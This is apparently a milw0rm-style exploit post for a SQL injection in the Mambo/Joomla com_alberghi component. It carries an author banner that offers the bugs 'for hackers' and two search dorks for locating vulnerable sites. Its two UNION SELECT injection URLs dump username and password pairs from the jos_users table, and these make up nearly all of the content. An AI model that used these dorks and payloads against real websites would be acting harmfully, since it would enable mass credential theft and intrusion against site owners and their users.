########################################## # # Mambo Component com_alberghi SQL Injection # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####MAİL : hackturkiye.hackturkiye@gmail.com # ########################################### TODAY MY BİRTDAY SOO I WROTE 5 BUGS ALL FOR HACKERS 5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE DONT FORGET MY PRESENT HACKERS GOOD LUCKY 100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi YASGUNUM NEDENiYLE HEDiYE iYi SANLAR you can see all my exploits http://my.opera.com/SQL-Injection/blog/ ########################################### # # DORK 1 : allinurl: "com_alberghi" detail # # DORK 2 : allinurl: "com_alberghi" # ########################################### EXPLOIT 1 : index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/* EXPLOIT 2 : index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/* ########################################### ##################S@BUN#################### ########################################### #####hackturkiye.hackturkiye@gmail.com##### ########################################### side note: Alberghi Vamba 14-04-2007 This component is released under the GNU/GPL License http://www.gnu.org/copyleft/gpl.html GNU/GPL webmaster@joomlaitalia.com www.joomlaitalia.com 2.1.3 Alberghi a fork of Accombo project original Author Niall McCullagh